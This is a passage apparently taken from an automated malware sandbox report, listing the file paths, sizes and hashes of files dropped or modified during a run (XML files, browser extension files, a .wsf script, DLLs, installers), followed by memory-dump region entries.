                                                                                                          SHA512

                                                                                                          c335203e2179ace80e75355fae5a36e30ba65ee26a4b328c667839d207d1ef17f472d3daa7f2f11cc7a6d2c554b209a48bc2195d893af8ec6d33f45dab572ff5

                                                                                                        • C:\Program Files (x86)\FsbTokjwukMU2\NePjJkU.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          dd441898dc44ede338c3322674c44023

                                                                                                          SHA1

                                                                                                          252510110ac0f2afc79fe793838852dcb913da49

                                                                                                          SHA256

                                                                                                          3004ab55eabf593a51e5450e751757cbc26b120d10c19b116bbf4980467be717

                                                                                                          SHA512

                                                                                                          956413f8a30866304520ebc758c5a32b89abf88347e82a3b35f8aac618f0165ad3946d29e7eab165db89dbcccb0fb71f336f0004f76faef6f46b6dd145e01263

                                                                                                        • C:\Program Files (x86)\kmBXJAkJjyTHqSsNouR\CcfalvR.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          0e1235d4735efc322bc5fd93cd50e945

                                                                                                          SHA1

                                                                                                          4b0e4c19210c0bd89ea72e6a625e7b3f62c6e358

                                                                                                          SHA256

                                                                                                          cf3a33e3418117590cba538552f1ccd249874ee0185ee06c03672daea55148d1

                                                                                                          SHA512

                                                                                                          2a5b69a53023a2c3cd491720bfc1105ee8d412aaafc990f7ff7867ca2b57e0c18f74fb99821c8870ffed3627f431c59523990acdc093921293f40bc26f6f9d8e

                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                          Filesize

                                                                                                          2.5MB

                                                                                                          MD5

                                                                                                          107a565c3cbd26ca4950fcbac46b6912

                                                                                                          SHA1

                                                                                                          037d46245ea703b9f9bcec0975ecf3cbad897714

                                                                                                          SHA256

                                                                                                          c4583168a33bc6a4b491fa2640483360635de1a355677a2ab95558b0aa7c11d9

                                                                                                          SHA512

                                                                                                          8680740d179a79f043bd358c20d2e0ce75bd76199c716ba6d90cb85a12b535896068295c6685ef0b3bf5272f7c0cc80cf61ed8a5e2da0d728674c3f4c32276aa

                                                                                                        • C:\ProgramData\xHjYKRHoNYMxhuVB\fSKpGUG.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          561c80f31acf87d4e73fc550c590076b

                                                                                                          SHA1

                                                                                                          7eeb48ce30fb06a0906deae0151e5687341acf32

                                                                                                          SHA256

                                                                                                          d365a41617e3aaa6ee6d8b3c9c0df6a2f6ff06e08d7b8447f1692533c45e6804

                                                                                                          SHA512

                                                                                                          cab0b8e1807ecab8a2b21d78f29db895888ff8ee41f50cab082a12d1a0174c36047ba7f529b77157015be2cc67b657efe9e5a25fcacb2de4eb3cc82227b16caf

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                          Filesize

                                                                                                          187B

                                                                                                          MD5

                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                          SHA1

                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                          SHA256

                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                          SHA512

                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                          Filesize

                                                                                                          136B

                                                                                                          MD5

                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                          SHA1

                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                          SHA256

                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                          SHA512

                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                          Filesize

                                                                                                          150B

                                                                                                          MD5

                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                          SHA1

                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                          SHA256

                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                          SHA512

                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                          Filesize

                                                                                                          10KB

                                                                                                          MD5

                                                                                                          a8b11606dbdcff736dc78962794e8122

                                                                                                          SHA1

                                                                                                          e4409d5f700bb2f8363c4062fcbe64bec92639d7

                                                                                                          SHA256

                                                                                                          c2f4987c8c269716f5a34d937c77390c51ee00ad92f4dcf0b5bec389465e303e

                                                                                                          SHA512

                                                                                                          985e749be6bfd982204ffe113575aabc77539a89a733c83eeda5ac829981a233f13fc3339ce757492ac926e3825d491a4b8cc01db1fff6d604529e6121b57b46

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                          Filesize

                                                                                                          26KB

                                                                                                          MD5

                                                                                                          6655857fab1fa75a9e84cc662f6c55b8

                                                                                                          SHA1

                                                                                                          ac8ae7839199a46cc33ff0800979404888950859

                                                                                                          SHA256

                                                                                                          ef762f9ae938138f89eb8e45aaa59aeedc4b949021ecc029321cabad0d0b6c1f

                                                                                                          SHA512

                                                                                                          4347e27556323d474eff67bf567d666a0034121805dbb4bd60d087e22481838976791ad733a7b0823eb42d5fa3c7ac746e55b5fc1fad99b1e09970e825cf3c09

                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4VPD6ES8NNTWIO2SDFT5.temp

                                                                                                          Filesize

                                                                                                          7KB

                                                                                                          MD5

                                                                                                          13e90bf20c251e041b86eba4b52c87c7

                                                                                                          SHA1

                                                                                                          ac951bf71cca47ceb54591d2fd99b890f0091afc

                                                                                                          SHA256

                                                                                                          a94b9c674c9811cf091217fa9af57b2e31f19ad11e776a0f363bcd0de17ce7a4

                                                                                                          SHA512

                                                                                                          2fc5af4d6ef136da891574aad0e90b6ee5cdd43f92028e19c81dac7fd6f7c6237a85109f8254c851d9ecb7efcb8ea312121648b17173ca3afd7236eef151d38f

                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                          Filesize

                                                                                                          7KB

                                                                                                          MD5

                                                                                                          99922d83b129f95829152c7fd074e408

                                                                                                          SHA1

                                                                                                          85cf24f4def4d2845c36b2cd0079c673edd51153

                                                                                                          SHA256

                                                                                                          4f7ca572fb02ba412c4ce6a37489a3cc85e211d754ecc091746accd7dce64b8c

                                                                                                          SHA512

                                                                                                          64d35b3355fd6adf30d83fe3ef1d8e3e168acf1291ed0243b38f74701c697758ec40eff137a910072c96f1adfc6882821999a432fd4c42132323f8ac2fcfd232

                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                          Filesize

                                                                                                          7KB

                                                                                                          MD5

                                                                                                          7831a55609e5240dea2375b519a42e30

                                                                                                          SHA1

                                                                                                          2b6bc489c7246e4927abe1b1276bad9ef3d5c25a

                                                                                                          SHA256

                                                                                                          8a8ed7ca07860cfa99dabe964461399a1422d4d3d5fc6c7a4540ddf4226d421f

                                                                                                          SHA512

                                                                                                          f546b20367773434b88d611dab9d977421efdaf8d880e1d1234381b5e641cbc3b8c8e54ec626f0e06a7d0968632c39a6c02fa283d0d358f948c1c1a70b51c864

                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bs4a8d8y.default-release\prefs.js

                                                                                                          Filesize

                                                                                                          7KB

                                                                                                          MD5

                                                                                                          c4a8d06a40d64896c97471396a024a1c

                                                                                                          SHA1

                                                                                                          76b7a6a074fe0ff2327a0234053bab287a04ecb4

                                                                                                          SHA256

                                                                                                          783de61185ee08770ab01ac94902e475519d57001ec71e9a4cdcde842d505777

                                                                                                          SHA512

                                                                                                          1286d2079c233f7c22d6e216d243df51bf48b79aab8ee22f0c7d443f678180d13d02c56f5d639f6a3a1542584944fac5c27073220aa26dd0c6e11536e9802158

                                                                                                        • C:\Windows\Temp\zeoxHVLKMRnVtqWd\MZAyUiia\qKDDodxNtDjGLntE.wsf

                                                                                                          Filesize

                                                                                                          9KB

                                                                                                          MD5

                                                                                                          31f5c65805d484391c7079ee242bdfa6

                                                                                                          SHA1

                                                                                                          3ae0473fdff8744b427096253810e313d9ff7fff

                                                                                                          SHA256

                                                                                                          73c57f963074758bba413eaa5b6c845aeeb455ac2dff3982a48470c7126fb112

                                                                                                          SHA512

                                                                                                          d869e59020bbf58157b2aa66d7d3377ba1a4139ee3f0f6b5f6ebe224ed1b1339580c8ddf07efc2797f9021d5772b3735bf743588875a5c2f8f89b7a446726d4d

                                                                                                        • C:\Windows\Temp\zeoxHVLKMRnVtqWd\ezGHSrJV\pOiexPI.dll

                                                                                                          Filesize

                                                                                                          6.5MB

                                                                                                          MD5

                                                                                                          af34e8ba9cffa4465f8de8e173c638da

                                                                                                          SHA1

                                                                                                          cebe47cebfd66c56011c4ca60e2f2a05a1b81827

                                                                                                          SHA256

                                                                                                          6348828debdf6df61d70093b51b5b68d6850b047600650837def3caebee48cf1

                                                                                                          SHA512

                                                                                                          5e9221a457d489998d94ea9da9662363ad295237ac07483983992bd4438bdae97bd7599d3fea323113049d8392754ea94d888ad9d8e05fd0031cf4b7c2740f3e

                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                          Filesize

                                                                                                          5KB

                                                                                                          MD5

                                                                                                          d9b0200d593b7447566485fd1a5b1e4d

                                                                                                          SHA1

                                                                                                          8bb3beff4fec8130488e6585f60c32906589052e

                                                                                                          SHA256

                                                                                                          3490dc36fcbd29151aad4e6580597713df36bf105954ad11d60a8efd7fc33a0c

                                                                                                          SHA512

                                                                                                          552961b2162ae649f4b13bd6c971152b6e2763dbc306c12ed35972e16782e14eb3dcdd9c55baf77e284f4cea0d7ec48d11fc4d12df40f6dc447ca1a091e351a7

                                                                                                        • \Users\Admin\AppData\Local\Temp\7zSC14C.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          93788bf41d7219c65625d404025288ff

                                                                                                          SHA1

                                                                                                          970eb803f8ad56f7840d9d9867717cd12be38e89

                                                                                                          SHA256

                                                                                                          587beef8cc8b2e1b748932ab536a25e4b7a6b4dd9f87a73a62f87deab77341da

                                                                                                          SHA512

                                                                                                          7f34317ad7f412890e9ab12e9abc70858872a83f357d5576e4b29ed01e2b2bfea7b9ef681aec285fc12e587fa5e3f38ad7a8349ff0fa0d403b60d7fed9febc2f

                                                                                                        • \Users\Admin\AppData\Local\Temp\7zSC3BC.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                          MD5

                                                                                                          33f58b25927d9d5a7876c6459bbfc507

                                                                                                          SHA1

                                                                                                          3acd984915850465ccee04d07225f0286e4c6043

                                                                                                          SHA256

                                                                                                          3cd2b265f74c28d4c64657fb335073eb08ff0b0aa30b4c6944624f33e65c782d

                                                                                                          SHA512

                                                                                                          9fdc0500c61f1b2007af90cc0617eb804f3fe4084450649f6367a01e09b0e6bcca328fe227103205bda0fb3ff2b5d96e30aca59c668b7025c56cbfe21632fc0e

                                                                                                        • memory/1564-338-0x0000000001540000-0x0000000001B22000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/1696-90-0x00000000013E0000-0x0000000001A91000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/1696-366-0x00000000013E0000-0x0000000001A91000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/1696-92-0x0000000010000000-0x00000000105E2000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/1696-104-0x00000000023E0000-0x0000000002465000-memory.dmp

                                                                                                          Filesize

                                                                                                          532KB

                                                                                                        • memory/1696-335-0x0000000003A90000-0x0000000003B6D000-memory.dmp

                                                                                                          Filesize

                                                                                                          884KB

                                                                                                        • memory/1696-137-0x0000000002470000-0x00000000024D2000-memory.dmp

                                                                                                          Filesize

                                                                                                          392KB

                                                                                                        • memory/1696-213-0x00000000013E0000-0x0000000001A91000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/1696-321-0x0000000002830000-0x00000000028B9000-memory.dmp

                                                                                                          Filesize

                                                                                                          548KB

                                                                                                        • memory/2156-40-0x00000000024F0000-0x0000000002BA1000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2156-22-0x00000000024F0000-0x0000000002BA1000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2236-58-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2236-57-0x000000001B580000-0x000000001B862000-memory.dmp

                                                                                                          Filesize

                                                                                                          2.9MB

                                                                                                        • memory/2304-43-0x00000000012C0000-0x0000000001971000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2304-24-0x0000000001980000-0x0000000002031000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2304-42-0x0000000001980000-0x0000000002031000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2304-41-0x0000000001980000-0x0000000002031000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2304-23-0x0000000001980000-0x0000000002031000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2304-29-0x0000000010000000-0x00000000105E2000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/2304-26-0x00000000012C0000-0x0000000001971000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2304-25-0x0000000001980000-0x0000000002031000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2456-69-0x00000000028E0000-0x00000000028E8000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/2456-68-0x000000001B650000-0x000000001B932000-memory.dmp

                                                                                                          Filesize

                                                                                                          2.9MB

                                                                                                        • memory/2920-47-0x0000000010000000-0x00000000105E2000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/2920-46-0x0000000000B60000-0x0000000001211000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2920-59-0x0000000000B60000-0x0000000001211000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/2920-91-0x0000000000B60000-0x0000000001211000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB